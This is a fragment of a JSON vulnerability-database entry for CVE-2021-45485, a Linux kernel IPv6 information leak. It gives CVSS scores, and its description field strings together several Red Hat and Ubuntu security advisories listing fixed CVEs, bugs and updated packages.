"_id": null,
"model": "fas/aff baseboard management controller 8300",
"scope": null,
"trust": 0.8,
"vendor": "netapp",
"version": null
}
],
"sources": [
{
"db": "JVNDB",
"id": "JVNDB-2021-017434"
},
{
"db": "NVD",
"id": "CVE-2021-45485"
}
]
},
"credits": {
"_id": null,
"data": "Red Hat",
"sources": [
{
"db": "PACKETSTORM",
"id": "167602"
},
{
"db": "PACKETSTORM",
"id": "167622"
},
{
"db": "PACKETSTORM",
"id": "167072"
},
{
"db": "PACKETSTORM",
"id": "167330"
},
{
"db": "PACKETSTORM",
"id": "169695"
},
{
"db": "PACKETSTORM",
"id": "169997"
}
],
"trust": 0.6
},
"cve": "CVE-2021-45485",
"cvss": {
"_id": null,
"data": [
{
"cvssV2": [
{
"accessComplexity": "LOW",
"accessVector": "NETWORK",
"authentication": "NONE",
"author": "nvd@nist.gov",
"availabilityImpact": "NONE",
"baseScore": 5.0,
"confidentialityImpact": "PARTIAL",
"exploitabilityScore": 10.0,
"id": "CVE-2021-45485",
"impactScore": 2.9,
"integrityImpact": "NONE",
"severity": "MEDIUM",
"trust": 1.9,
"vectorString": "AV:N/AC:L/Au:N/C:P/I:N/A:N",
"version": "2.0"
},
{
"accessComplexity": "LOW",
"accessVector": "NETWORK",
"authentication": "NONE",
"author": "VULHUB",
"availabilityImpact": "NONE",
"baseScore": 5.0,
"confidentialityImpact": "PARTIAL",
"exploitabilityScore": 10.0,
"id": "VHN-409116",
"impactScore": 2.9,
"integrityImpact": "NONE",
"severity": "MEDIUM",
"trust": 0.1,
"vectorString": "AV:N/AC:L/AU:N/C:P/I:N/A:N",
"version": "2.0"
}
],
"cvssV3": [
{
"attackComplexity": "LOW",
"attackVector": "NETWORK",
"author": "nvd@nist.gov",
"availabilityImpact": "NONE",
"baseScore": 7.5,
"baseSeverity": "HIGH",
"confidentialityImpact": "HIGH",
"exploitabilityScore": 3.9,
"id": "CVE-2021-45485",
"impactScore": 3.6,
"integrityImpact": "NONE",
"privilegesRequired": "NONE",
"scope": "UNCHANGED",
"trust": 1.0,
"userInteraction": "NONE",
"vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N",
"version": "3.1"
},
{
"attackComplexity": "Low",
"attackVector": "Network",
"author": "NVD",
"availabilityImpact": "None",
"baseScore": 7.5,
"baseSeverity": "High",
"confidentialityImpact": "High",
"exploitabilityScore": null,
"id": "CVE-2021-45485",
"impactScore": null,
"integrityImpact": "None",
"privilegesRequired": "None",
"scope": "Unchanged",
"trust": 0.8,
"userInteraction": "None",
"vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N",
"version": "3.0"
}
],
"severity": [
{
"author": "nvd@nist.gov",
"id": "CVE-2021-45485",
"trust": 1.0,
"value": "HIGH"
},
{
"author": "NVD",
"id": "CVE-2021-45485",
"trust": 0.8,
"value": "High"
},
{
"author": "CNNVD",
"id": "CNNVD-202112-2265",
"trust": 0.6,
"value": "HIGH"
},
{
"author": "VULHUB",
"id": "VHN-409116",
"trust": 0.1,
"value": "MEDIUM"
},
{
"author": "VULMON",
"id": "CVE-2021-45485",
"trust": 0.1,
"value": "MEDIUM"
}
]
}
],
"sources": [
{
"db": "VULHUB",
"id": "VHN-409116"
},
{
"db": "VULMON",
"id": "CVE-2021-45485"
},
{
"db": "CNNVD",
"id": "CNNVD-202112-2265"
},
{
"db": "JVNDB",
"id": "JVNDB-2021-017434"
},
{
"db": "NVD",
"id": "CVE-2021-45485"
}
]
},
"description": {
"_id": null,
"data": "In the IPv6 implementation in the Linux kernel before 5.13.3, net/ipv6/output_core.c has an information leak because of certain use of a hash table which, although big, doesn\u0027t properly consider that IPv6-based attackers can typically choose among many IPv6 source addresses. Linux Kernel Exists in the use of cryptographic algorithms.Information may be obtained. Description:\n\nRed Hat Advanced Cluster Management for Kubernetes 2.4.5 images\n\nRed Hat Advanced Cluster Management for Kubernetes provides the\ncapabilities to address common challenges that administrators and site\nreliability engineers face as they work across a range of public and\nprivate cloud environments. Clusters and applications are all visible and\nmanaged from a single console\u2014with security policy built in. \nSee the following\nRelease Notes documentation, which will be updated shortly for this\nrelease, for additional details about this release:\n\nhttps://access.redhat.com/documentation/en-us/red_hat_advanced_cluster_management_for_kubernetes/2.4/html/release_notes/\n\nSecurity fixes:\n\n* golang.org/x/crypto: empty plaintext packet causes panic (CVE-2021-43565)\n\n* nconf: Prototype pollution in memory store (CVE-2022-21803)\n\n* golang: crypto/elliptic IsOnCurve returns true for invalid field elements\n(CVE-2022-23806)\n\n* nats-server: misusing the \"dynamically provisioned sandbox accounts\"\nfeature authenticated user can obtain the privileges of the System account\n(CVE-2022-24450)\n\n* Moment.js: Path traversal in moment.locale (CVE-2022-24785)\n\n* dset: Prototype Pollution in dset (CVE-2022-25645)\n\n* golang: syscall: faccessat checks wrong group (CVE-2022-29526)\n\n* go-getter: writes SSH credentials into logfile, exposing sensitive\ncredentials to local uses (CVE-2022-29810)\n\nBug fixes:\n\n* Trying to create a new cluster on vSphere and no feedback, stuck in\n\"creating\" (BZ# 1937078)\n\n* Wrong message is displayed when GRC fails to connect to an Ansible Tower\n(BZ# 2051752)\n\n* multicluster_operators_hub_subscription issues due to /tmp usage (BZ#\n2052702)\n\n* Create Cluster, Worker Pool 2 zones do not load options that relate to\nthe selected Region field (BZ# 2054954)\n\n* Changing the multiclusterhub name other than the default name keeps the\nversion in the web console loading (BZ# 2059822)\n\n* search-redisgraph-0 generating massive amount of logs after 2.4.2 upgrade\n(BZ# 2065318)\n\n* Uninstall pod crashed when destroying Azure Gov cluster in ACM (BZ#\n2073562)\n\n* Deprovisioned clusters not filtered out by discovery controller (BZ#\n2075594)\n\n* When deleting a secret for a Helm application, duplicate errors show up\nin topology (BZ# 2075675)\n\n* Changing existing placement rules does not change YAML file Regression\n(BZ# 2075724)\n\n* Editing Helm Argo Applications does not Prune Old Resources (BZ# 2079906)\n\n* Failed to delete the requested resource [404] error appears after\nsubscription is deleted and its placement rule is used in the second\nsubscription (BZ# 2080713)\n\n* Typo in the logs when Deployable is updated in the subscription namespace\n(BZ# 2080960)\n\n* After Argo App Sets are created in an Upgraded Environment, the Clusters\ncolumn does not indicate the clusters (BZ# 2080716)\n\n* RHACM 2.4.5 images (BZ# 2081438)\n\n* Performance issue to get secret in claim-controller (BZ# 2081908)\n\n* Failed to provision openshift 4.10 on bare metal (BZ# 2094109)\n\n3. Bugs fixed (https://bugzilla.redhat.com/):\n\n1937078 - Trying to create a new cluster on vSphere and no feedback, stuck in \"creating\"\n2030787 - CVE-2021-43565 golang.org/x/crypto: empty plaintext packet causes panic\n2051752 - Wrong message is displayed when GRC fails to connect to an ansible tower\n2052573 - CVE-2022-24450 nats-server: misusing the \"dynamically provisioned sandbox accounts\" feature authenticated user can obtain the privileges of the System account\n2052702 - multicluster_operators_hub_subscription issues due to /tmp usage\n2053429 - CVE-2022-23806 golang: crypto/elliptic IsOnCurve returns true for invalid field elements\n2054954 - Create Cluster, Worker Pool 2 zones do not load options that relate to the selected Region field\n2059822 - Changing the multiclusterhub name other than the default name keeps the version in the web console loading. \n2065318 - search-redisgraph-0 generating massive amount of logs after 2.4.2 upgrade\n2072009 - CVE-2022-24785 Moment.js: Path traversal in moment.locale\n2073562 - Uninstall pod crashed when destroying Azure Gov cluster in ACM\n2074689 - CVE-2022-21803 nconf: Prototype pollution in memory store\n2075594 - Deprovisioned clusters not filtered out by discovery controller\n2075675 - When deleting a secret for a Helm application, duplicate errors show up in topology\n2075724 - Changing existing placement rules does not change YAML file\n2079906 - Editing Helm Argo Applications does not Prune Old Resources\n2080279 - CVE-2022-29810 go-getter: writes SSH credentials into logfile, exposing sensitive credentials to local uses\n2080713 - Failed to delete the requested resource [404] error appears after subscription is deleted and it\u0027s placement rule is used in the second subscription [Upgrade]\n2080716 - After Argo App Sets are created in an Upgraded Environment, the Clusters column does not indicate the clusters\n2080847 - CVE-2022-25645 dset: Prototype Pollution in dset\n2080960 - Typo in the logs when Deployable is updated in the subscription namespace\n2081438 - RHACM 2.4.5 images\n2081908 - Performance issue to get secret in claim-controller\n2084085 - CVE-2022-29526 golang: syscall: faccessat checks wrong group\n2094109 - Failed to provision openshift 4.10 on bare metal\n\n5. See the following Release Notes documentation, which will be updated\nshortly for this release, for additional details about this release:\n\nhttps://access.redhat.com/documentation/en-us/red_hat_advanced_cluster_management_for_kubernetes/2.3/html/release_notes/\n\nSecurity fixes: \n\n* node-fetch: exposure of sensitive information to an unauthorized actor\n(CVE-2022-0235)\n\n* follow-redirects: Exposure of Sensitive Information via Authorization\nHeader leak (CVE-2022-0536)\n\n* nconf: Prototype pollution in memory store (CVE-2022-21803)\n\n* golang: crypto/elliptic IsOnCurve returns true for invalid field elements\n(CVE-2022-23806)\n\n* Moment.js: Path traversal in moment.locale (CVE-2022-24785)\n\n* golang: syscall: faccessat checks wrong group (CVE-2022-29526)\n\n* go-getter: writes SSH credentials into logfile, exposing sensitive\ncredentials to local uses (CVE-2022-29810)\n\nBug fixes:\n\n* RHACM 2.3.11 images (BZ# 2082087)\n\n3. Bugs fixed (https://bugzilla.redhat.com/):\n\n2044591 - CVE-2022-0235 node-fetch: exposure of sensitive information to an unauthorized actor\n2053259 - CVE-2022-0536 follow-redirects: Exposure of Sensitive Information via Authorization Header leak\n2053429 - CVE-2022-23806 golang: crypto/elliptic IsOnCurve returns true for invalid field elements\n2072009 - CVE-2022-24785 Moment.js: Path traversal in moment.locale\n2074689 - CVE-2022-21803 nconf: Prototype pollution in memory store\n2080279 - CVE-2022-29810 go-getter: writes SSH credentials into logfile, exposing sensitive credentials to local uses\n2082087 - RHACM 2.3.11 images\n2084085 - CVE-2022-29526 golang: syscall: faccessat checks wrong group\n\n5. -----BEGIN PGP SIGNED MESSAGE-----\nHash: SHA256\n\n=====================================================================\n Red Hat Security Advisory\n\nSynopsis: Important: kernel-rt security and bug fix update\nAdvisory ID: RHSA-2022:1975-01\nProduct: Red Hat Enterprise Linux\nAdvisory URL: https://access.redhat.com/errata/RHSA-2022:1975\nIssue date: 2022-05-10\nCVE Names: CVE-2020-0404 CVE-2020-13974 CVE-2020-27820 \n CVE-2021-0941 CVE-2021-3612 CVE-2021-3669 \n CVE-2021-3743 CVE-2021-3744 CVE-2021-3752 \n CVE-2021-3759 CVE-2021-3764 CVE-2021-3772 \n CVE-2021-3773 CVE-2021-4002 CVE-2021-4037 \n CVE-2021-4083 CVE-2021-4157 CVE-2021-4197 \n CVE-2021-4203 CVE-2021-20322 CVE-2021-26401 \n CVE-2021-29154 CVE-2021-37159 CVE-2021-41864 \n CVE-2021-42739 CVE-2021-43389 CVE-2021-43976 \n CVE-2021-44733 CVE-2021-45485 CVE-2021-45486 \n CVE-2022-0001 CVE-2022-0002 CVE-2022-0286 \n CVE-2022-0322 CVE-2022-1011 \n=====================================================================\n\n1. Summary:\n\nAn update for kernel-rt is now available for Red Hat Enterprise Linux 8. \n\nRed Hat Product Security has rated this update as having a security impact\nof Important. A Common Vulnerability Scoring System (CVSS) base score,\nwhich gives a detailed severity rating, is available for each vulnerability\nfrom the CVE link(s) in the References section. \n\n2. Relevant releases/architectures:\n\nRed Hat Enterprise Linux Real Time (v. 8) - x86_64\nRed Hat Enterprise Linux Real Time for NFV (v. 8) - x86_64\n\n3. Description:\n\nThe kernel-rt packages provide the Real Time Linux Kernel, which enables\nfine-tuning for systems with extremely high determinism requirements. \n\nSecurity Fix(es):\n\n* kernel: fget: check that the fd still exists after getting a ref to it\n(CVE-2021-4083)\n\n* kernel: avoid cyclic entity chains due to malformed USB descriptors\n(CVE-2020-0404)\n\n* kernel: integer overflow in k_ascii() in drivers/tty/vt/keyboard.c\n(CVE-2020-13974)\n\n* kernel: out-of-bounds read in bpf_skb_change_head() of filter.c due to a\nuse-after-free (CVE-2021-0941)\n\n* kernel: joydev: zero size passed to joydev_handle_JSIOCSBTNMAP()\n(CVE-2021-3612)\n\n* kernel: reading /proc/sysvipc/shm does not scale with large shared memory\nsegment counts (CVE-2021-3669)\n\n* kernel: out-of-bound Read in qrtr_endpoint_post in net/qrtr/qrtr.c\n(CVE-2021-3743)\n\n* kernel: crypto: ccp - fix resource leaks in ccp_run_aes_gcm_cmd()\n(CVE-2021-3744)\n\n* kernel: possible use-after-free in bluetooth module (CVE-2021-3752)\n\n* kernel: unaccounted ipc objects in Linux kernel lead to breaking memcg\nlimits and DoS attacks (CVE-2021-3759)\n\n* kernel: DoS in ccp_run_aes_gcm_cmd() function (CVE-2021-3764)\n\n* kernel: sctp: Invalid chunks may be used to remotely remove existing\nassociations (CVE-2021-3772)\n\n* kernel: lack of port sanity checking in natd and netfilter leads to\nexploit of OpenVPN clients (CVE-2021-3773)\n\n* kernel: possible leak or coruption of data residing on hugetlbfs\n(CVE-2021-4002)\n\n* kernel: security regression for CVE-2018-13405 (CVE-2021-4037)\n\n* kernel: Buffer overwrite in decode_nfs_fh function (CVE-2021-4157)\n\n* kernel: cgroup: Use open-time creds and namespace for migration perm\nchecks (CVE-2021-4197)\n\n* kernel: Race condition in races in sk_peer_pid and sk_peer_cred accesses\n(CVE-2021-4203)\n\n* kernel: new DNS Cache Poisoning Attack based on ICMP fragment needed\npackets replies (CVE-2021-20322)\n\n* hw: cpu: LFENCE/JMP Mitigation Update for CVE-2017-5715 (CVE-2021-26401)\n\n* kernel: Local privilege escalation due to incorrect BPF JIT branch\ndisplacement computation (CVE-2021-29154)\n\n* kernel: use-after-free in hso_free_net_device() in drivers/net/usb/hso.c\n(CVE-2021-37159)\n\n* kernel: eBPF multiplication integer overflow in\nprealloc_elems_and_freelist() in kernel/bpf/stackmap.c leads to\nout-of-bounds write (CVE-2021-41864)\n\n* kernel: Heap buffer overflow in firedtv driver (CVE-2021-42739)\n\n* kernel: an array-index-out-bounds in detach_capi_ctr in\ndrivers/isdn/capi/kcapi.c (CVE-2021-43389)\n\n* kernel: mwifiex_usb_recv() in drivers/net/wireless/marvell/mwifiex/usb.c\nallows an attacker to cause DoS via crafted USB device (CVE-2021-43976)\n\n* kernel: use-after-free in the TEE subsystem (CVE-2021-44733)\n\n* kernel: information leak in the IPv6 implementation (CVE-2021-45485)\n\n* kernel: information leak in the IPv4 implementation (CVE-2021-45486)\n\n* hw: cpu: intel: Branch History Injection (BHI) (CVE-2022-0001)\n\n* hw: cpu: intel: Intra-Mode BTI (CVE-2022-0002)\n\n* kernel: Local denial of service in bond_ipsec_add_sa (CVE-2022-0286)\n\n* kernel: DoS in sctp_addto_chunk in net/sctp/sm_make_chunk.c\n(CVE-2022-0322)\n\n* kernel: FUSE allows UAF reads of write() buffers, allowing theft of\n(partial) /etc/shadow hashes (CVE-2022-1011)\n\n* kernel: use-after-free in nouveau kernel module (CVE-2020-27820)\n\nFor more details about the security issue(s), including the impact, a CVSS\nscore, acknowledgments, and other related information, refer to the CVE\npage(s) listed in the References section. \n\nAdditional Changes:\n\nFor detailed information on changes in this release, see the Red Hat\nEnterprise Linux 8.6 Release Notes linked from the References section. \n\n4. Solution:\n\nFor details on how to apply this update, which includes the changes\ndescribed in this advisory, refer to:\n\nhttps://access.redhat.com/articles/11258\n\nThe system must be rebooted for this update to take effect. \n\n5. Bugs fixed (https://bugzilla.redhat.com/):\n\n1901726 - CVE-2020-27820 kernel: use-after-free in nouveau kernel module\n1903578 - kernnel-rt-debug: do not call blocking ops when !TASK_RUNNING; state=1 set at [\u003c0000000050e86018\u003e] handle_userfault+0x530/0x1820\n1905749 - kernel-rt-debug: BUG: sleeping function called from invalid context at kernel/locking/rtmutex.c:968\n1919791 - CVE-2020-0404 kernel: avoid cyclic entity chains due to malformed USB descriptors\n1946684 - CVE-2021-29154 kernel: Local privilege escalation due to incorrect BPF JIT branch displacement computation\n1951739 - CVE-2021-42739 kernel: Heap buffer overflow in firedtv driver\n1974079 - CVE-2021-3612 kernel: joydev: zero size passed to joydev_handle_JSIOCSBTNMAP()\n1985353 - CVE-2021-37159 kernel: use-after-free in hso_free_net_device() in drivers/net/usb/hso.c\n1986473 - CVE-2021-3669 kernel: reading /proc/sysvipc/shm does not scale with large shared memory segment counts\n1997467 - CVE-2021-3764 kernel: DoS in ccp_run_aes_gcm_cmd() function\n1997961 - CVE-2021-3743 kernel: out-of-bound Read in qrtr_endpoint_post in net/qrtr/qrtr.c\n1999544 - CVE-2021-3752 kernel: possible use-after-free in bluetooth module\n1999675 - CVE-2021-3759 kernel: unaccounted ipc objects in Linux kernel lead to breaking memcg limits and DoS attacks\n2000627 - CVE-2021-3744 kernel: crypto: ccp - fix resource leaks in ccp_run_aes_gcm_cmd()\n2000694 - CVE-2021-3772 kernel: sctp: Invalid chunks may be used to remotely remove existing associations\n2004949 - CVE-2021-3773 kernel: lack of port sanity checking in natd and netfilter leads to exploit of OpenVPN clients\n2010463 - CVE-2021-41864 kernel: eBPF multiplication integer overflow in prealloc_elems_and_freelist() in kernel/bpf/stackmap.c leads to out-of-bounds write\n2013180 - CVE-2021-43389 kernel: an array-index-out-bounds in detach_capi_ctr in drivers/isdn/capi/kcapi.c\n2014230 - CVE-2021-20322 kernel: new DNS Cache Poisoning Attack based on ICMP fragment needed packets replies\n2016169 - CVE-2020-13974 kernel: integer overflow in k_ascii() in drivers/tty/vt/keyboard.c\n2018205 - CVE-2021-0941 kernel: out-of-bounds read in bpf_skb_change_head() of filter.c due to a use-after-free\n2025003 - CVE-2021-43976 kernel: mwifiex_usb_recv() in drivers/net/wireless/marvell/mwifiex/usb.c allows an attacker to cause DoS via crafted USB device\n2025726 - CVE-2021-4002 kernel: possible leak or coruption of data residing on hugetlbfs\n2027239 - CVE-2021-4037 kernel: security regression for CVE-2018-13405\n2029923 - CVE-2021-4083 kernel: fget: check that the fd still exists after getting a ref to it\n2030747 - CVE-2021-44733 kernel: use-after-free in the TEE subsystem\n2034342 - CVE-2021-4157 kernel: Buffer overwrite in decode_nfs_fh function\n2035652 - CVE-2021-4197 kernel: cgroup: Use open-time creds and namespace for migration perm checks\n2036934 - CVE-2021-4203 kernel: Race condition in races in sk_peer_pid and sk_peer_cred accesses\n2037019 - CVE-2022-0286 kernel: Local denial of service in bond_ipsec_add_sa\n2039911 - CVE-2021-45485 kernel: information leak in the IPv6 implementation\n2039914 - CVE-2021-45486 kernel: information leak in the IPv4 implementation\n2042822 - CVE-2022-0322 kernel: DoS in sctp_addto_chunk in net/sctp/sm_make_chunk.c\n2061700 - CVE-2021-26401 hw: cpu: LFENCE/JMP Mitigation Update for CVE-2017-5715\n2061712 - CVE-2022-0001 hw: cpu: intel: Branch History Injection (BHI)\n2061721 - CVE-2022-0002 hw: cpu: intel: Intra-Mode BTI\n2064855 - CVE-2022-1011 kernel: FUSE allows UAF reads of write() buffers, allowing theft of (partial) /etc/shadow hashes\n\n6. Package List:\n\nRed Hat Enterprise Linux Real Time for NFV (v. 8):\n\nSource:\nkernel-rt-4.18.0-372.9.1.rt7.166.el8.src.rpm\n\nx86_64:\nkernel-rt-4.18.0-372.9.1.rt7.166.el8.x86_64.rpm\nkernel-rt-core-4.18.0-372.9.1.rt7.166.el8.x86_64.rpm\nkernel-rt-debug-4.18.0-372.9.1.rt7.166.el8.x86_64.rpm\nkernel-rt-debug-core-4.18.0-372.9.1.rt7.166.el8.x86_64.rpm\nkernel-rt-debug-debuginfo-4.18.0-372.9.1.rt7.166.el8.x86_64.rpm\nkernel-rt-debug-devel-4.18.0-372.9.1.rt7.166.el8.x86_64.rpm\nkernel-rt-debug-kvm-4.18.0-372.9.1.rt7.166.el8.x86_64.rpm\nkernel-rt-debug-modules-4.18.0-372.9.1.rt7.166.el8.x86_64.rpm\nkernel-rt-debug-modules-extra-4.18.0-372.9.1.rt7.166.el8.x86_64.rpm\nkernel-rt-debuginfo-4.18.0-372.9.1.rt7.166.el8.x86_64.rpm\nkernel-rt-debuginfo-common-x86_64-4.18.0-372.9.1.rt7.166.el8.x86_64.rpm\nkernel-rt-devel-4.18.0-372.9.1.rt7.166.el8.x86_64.rpm\nkernel-rt-kvm-4.18.0-372.9.1.rt7.166.el8.x86_64.rpm\nkernel-rt-modules-4.18.0-372.9.1.rt7.166.el8.x86_64.rpm\nkernel-rt-modules-extra-4.18.0-372.9.1.rt7.166.el8.x86_64.rpm\n\nRed Hat Enterprise Linux Real Time (v. 8):\n\nSource:\nkernel-rt-4.18.0-372.9.1.rt7.166.el8.src.rpm\n\nx86_64:\nkernel-rt-4.18.0-372.9.1.rt7.166.el8.x86_64.rpm\nkernel-rt-core-4.18.0-372.9.1.rt7.166.el8.x86_64.rpm\nkernel-rt-debug-4.18.0-372.9.1.rt7.166.el8.x86_64.rpm\nkernel-rt-debug-core-4.18.0-372.9.1.rt7.166.el8.x86_64.rpm\nkernel-rt-debug-debuginfo-4.18.0-372.9.1.rt7.166.el8.x86_64.rpm\nkernel-rt-debug-devel-4.18.0-372.9.1.rt7.166.el8.x86_64.rpm\nkernel-rt-debug-modules-4.18.0-372.9.1.rt7.166.el8.x86_64.rpm\nkernel-rt-debug-modules-extra-4.18.0-372.9.1.rt7.166.el8.x86_64.rpm\nkernel-rt-debuginfo-4.18.0-372.9.1.rt7.166.el8.x86_64.rpm\nkernel-rt-debuginfo-common-x86_64-4.18.0-372.9.1.rt7.166.el8.x86_64.rpm\nkernel-rt-devel-4.18.0-372.9.1.rt7.166.el8.x86_64.rpm\nkernel-rt-modules-4.18.0-372.9.1.rt7.166.el8.x86_64.rpm\nkernel-rt-modules-extra-4.18.0-372.9.1.rt7.166.el8.x86_64.rpm\n\nThese packages are GPG signed by Red Hat for security. Our key and\ndetails on how to verify the signature are available from\nhttps://access.redhat.com/security/team/key/\n\n7. Contact:\n\nThe Red Hat security contact is \u003csecalert@redhat.com\u003e. More contact\ndetails at https://access.redhat.com/security/team/contact/\n\nCopyright 2022 Red Hat, Inc. \n-----BEGIN PGP SIGNATURE-----\nVersion: GnuPG v1\n\niQIVAwUBYnqRVtzjgjWX9erEAQjwiA//R/ZVJ7xroUR7Uf1az+8xZqs4OZQADIUc\n/92cDd6MRyzkvwQx5u7JmD5E6KbRf3NGfDsuoC0jVJJJcp8GT0tWkxPIjCi2RNbI\n/9nlbkfp0eQqRGmpL753W/7sfzAnbiOeP47rr+lJU24OBDcbrZn5X3Ex0EdzcdeD\nfmVnAxB8bsXyZwcnX9m6mVlBxY+fm6SC78O+/rPzVUHl5NhQASqi0sYSwydyqZvG\na/9p5gXd9nnyV7NtJj58pS7brxQFq4RcM5VhTjix3a/ZaZEwT+nDMj3+RXXwUhGe\nHJ6AdJoNI19huMXtn/fYhomb/LIHQos+kHQrBbJ+KmaFE4DD08Uv2uHSyeEe1ksT\noUwcGcIbSta6LBNO60Lh0XVj6FgFWNnNsAGX27nxCHfzDjuJ3U4Tyh8gL+ID2K1t\n3nwoQl5gxUokFS0sUIuD0pj2LFW1vg2E2pMcbzPDqFwj0MXn5DpTb4qeuiRWzA05\ns+upi3Cd6XmRNKPH8DDOrGNGW0dJqJtuXhUmziZjKPMJK5Ygnhoc+3hYG/EJzGiq\nS/VHXR5hnJ+RAPz2U8rETfCW2Dvz7lCUh5rJGg/8f8MCyAMCPpFqXbkNvpt3BIKy\n2SLBhh0Mci1fprA35q2eNCjduntja3oxnVx+YAKPM30hzE7ejwHFEZHPGOdKB0q/\naHIZwOKDLaE=\n=hqV1\n-----END PGP SIGNATURE-----\n--\nRHSA-announce mailing list\nRHSA-announce@redhat.com\nhttps://listman.redhat.com/mailman/listinfo/rhsa-announce\n. Summary:\n\nThe Migration Toolkit for Containers (MTC) 1.6.5 is now available. Description:\n\nThe Migration Toolkit for Containers (MTC) enables you to migrate\nKubernetes resources, persistent volume data, and internal container images\nbetween OpenShift Container Platform clusters, using the MTC web console or\nthe Kubernetes API. Bugs fixed (https://bugzilla.redhat.com/):\n\n2006044 - CVE-2021-39293 golang: archive/zip: malformed archive may cause panic or memory exhaustion (incomplete fix of CVE-2021-33196)\n2007557 - CVE-2021-3807 nodejs-ansi-regex: Regular expression denial of service (ReDoS) matching ANSI escape codes\n2057579 - [MTC UI] Cancel button on ?Migrations? page does not disappear when migration gets Failed/Succeeded with warnings\n2072311 - HPAs of DeploymentConfigs are not being updated when migration from Openshift 3.x to Openshift 4.x\n2074044 - [MTC] Rsync pods are not running as privileged\n2074553 - Upstream Hook Runner image requires arguments be in a different order\n\n5. Description:\n\nRed Hat OpenShift Container Platform is Red Hat\u0027s cloud computing\nKubernetes application platform solution designed for on-premise or private\ncloud deployments. \n\nThis advisory contains the container images for Red Hat OpenShift Container\nPlatform 4.10.39. See the following advisory for the RPM packages for this\nrelease:\n\nhttps://access.redhat.com/errata/RHBA-2022:7210\n\nSpace precludes documenting all of the container images in this advisory. \nSee the following Release Notes documentation, which will be updated\nshortly for this release, for details about these changes:\n\nhttps://docs.openshift.com/container-platform/4.10/release_notes/ocp-4-10-release-notes.html\n\nSecurity Fix(es):\n\n* go-getter: command injection vulnerability (CVE-2022-26945)\n* go-getter: unsafe download (issue 1 of 3) (CVE-2022-30321)\n* go-getter: unsafe download (issue 2 of 3) (CVE-2022-30322)\n* go-getter: unsafe download (issue 3 of 3) (CVE-2022-30323)\n\nFor more details about the security issue(s), including the impact, a CVSS\nscore, acknowledgments, and other related information, refer to the CVE\npage(s)\nlisted in the References section. \n\nYou may download the oc tool and use it to inspect release image metadata\nas follows:\n\n(For x86_64 architecture)\n\n$ oc adm release info\nquay.io/openshift-release-dev/ocp-release:4.10.39-x86_64\n\nThe image digest is\nsha256:59d7ac85da072fea542d7c43498e764c72933e306117a105eac7bd5dda4e6bbe\n\n(For s390x architecture)\n\n$ oc adm release info\nquay.io/openshift-release-dev/ocp-release:4.10.39-s390x\n\nThe image digest is\nsha256:6b243bd6078b0a0e570c7bdf88a345f0c145009f929844f4c8ceb4dc828c0a7a\n\n(For ppc64le architecture)\n\n$ oc adm release info\nquay.io/openshift-release-dev/ocp-release:4.10.39-ppc64le\n\nThe image digest is\nsha256:e28554de454e8955fe72cd124fa9893e2c1761d39452e05610ec062d637baf2e\n\n(For aarch64 architecture)\n\n$ oc adm release info\nquay.io/openshift-release-dev/ocp-release:4.10.39-aarch64\n\nThe image digest is\nsha256:cc0860b33c3631ee3624cc280d796fb01ce8f802c5d7ecde8ef4010aad941dc0\n\nAll OpenShift Container Platform 4.10 users are advised to upgrade to these\nupdated packages and images when they are available in the appropriate\nrelease channel. To check for available updates, use the OpenShift Console\nor the CLI oc command. Instructions for upgrading a cluster are available\nat\nhttps://docs.openshift.com/container-platform/4.10/updating/updating-cluster-cli.html\n\n3. Solution:\n\nFor OpenShift Container Platform 4.10 see the following documentation,\nwhich will be updated shortly for this release, for important instructions\non how to upgrade your cluster and fully apply this asynchronous errata\nupdate:\n\nhttps://docs.openshift.com/container-platform/4.10/release_notes/ocp-4-10-release-notes.html\n\nDetails on how to access this content are available at\nhttps://docs.openshift.com/container-platform/4.10/updating/updating-cluster-cli.html\n\n4. Bugs fixed (https://bugzilla.redhat.com/):\n\n2092918 - CVE-2022-30321 go-getter: unsafe download (issue 1 of 3)\n2092923 - CVE-2022-30322 go-getter: unsafe download (issue 2 of 3)\n2092925 - CVE-2022-30323 go-getter: unsafe download (issue 3 of 3)\n2092928 - CVE-2022-26945 go-getter: command injection vulnerability\n\n5. JIRA issues fixed (https://issues.jboss.org/):\n\nOCPBUGS-1538 - Make northd probe interval default to 10 seconds\nOCPBUGS-1696 - All Nodes overview in console are showing \"Something went wrong\"\nOCPBUGS-2162 - Facing issue while configuring egress IP pool in OCP cluster which uses STS\nOCPBUGS-2171 - [4.10] cri-o should report the stage of container and pod creation it\u0027s stuck at\nOCPBUGS-2196 - Symptom Detection.Undiagnosed panic detected in pod\nOCPBUGS-2208 - [4.10] Dual stack cluster fails on installation when multi-path routing entries exist\nOCPBUGS-2448 - Downward API (annotations) is missing PCI information when using the tuning metaPlugin on SR-IOV Networks\nOCPBUGS-2464 - Add unit-test and gofmt support for ovn-kubernetes\nOCPBUGS-2523 - e2e tests: Installs Red Hat Integration - 3scale operator test is failing due to change of Operator name\nOCPBUGS-2546 - Remove policy/v1beta1 in 4.10 and later\nOCPBUGS-2553 - [release-4.10] member loses rights after some other user login in openid / group sync\nOCPBUGS-2607 - [release-4.10] go.mod should beworking with golang-1.17 and golang-1.18\nOCPBUGS-2622 - CI: Backend unit tests fails because devfile registry was updated (mock response)\nOCPBUGS-2628 - Worker creation fails within provider networks (as primary and secondary)\nOCPBUGS-450 - KubeDaemonSetRolloutStuck alert using incorrect metric in 4.9 and 4.10\nOCPBUGS-691 - [2112237] [ Cluster storage Operator 4.x(10/11) ] DefaultStorageClassController report fake message \"No default StorageClass for this platform\" on Alicloud, IBM, Nutanix\n\n6. Solution:\n\nBefore applying this update, make sure all previously released errata\nrelevant to your system have been applied. Bugs fixed (https://bugzilla.redhat.com/):\n\n2094982 - CVE-2022-1996 go-restful: Authorization Bypass Through User-Controlled Key\n2130218 - 4.9.7 containers\n\n5. ==========================================================================\nUbuntu Security Notice USN-5299-1\nFebruary 22, 2022\n\nlinux, linux-aws, linux-kvm, linux-lts-xenial vulnerabilities\n==========================================================================\n\nA security issue affects these releases of Ubuntu and its derivatives:\n\n- Ubuntu 16.04 ESM\n- Ubuntu 14.04 ESM\n\nSummary:\n\nSeveral security issues were fixed in the Linux kernel. A physically proximate\nattacker could possibly use this issue to inject packets or exfiltrate\nselected fragments. (CVE-2020-26147)\n\nIt was discovered that the bluetooth subsystem in the Linux kernel did not\nproperly perform access control. An authenticated attacker could possibly\nuse this to expose sensitive information. (CVE-2020-26558, CVE-2021-0129)\n\nIt was discovered that the RPA PCI Hotplug driver implementation in the\nLinux kernel did not properly handle device name writes via sysfs, leading\nto a buffer 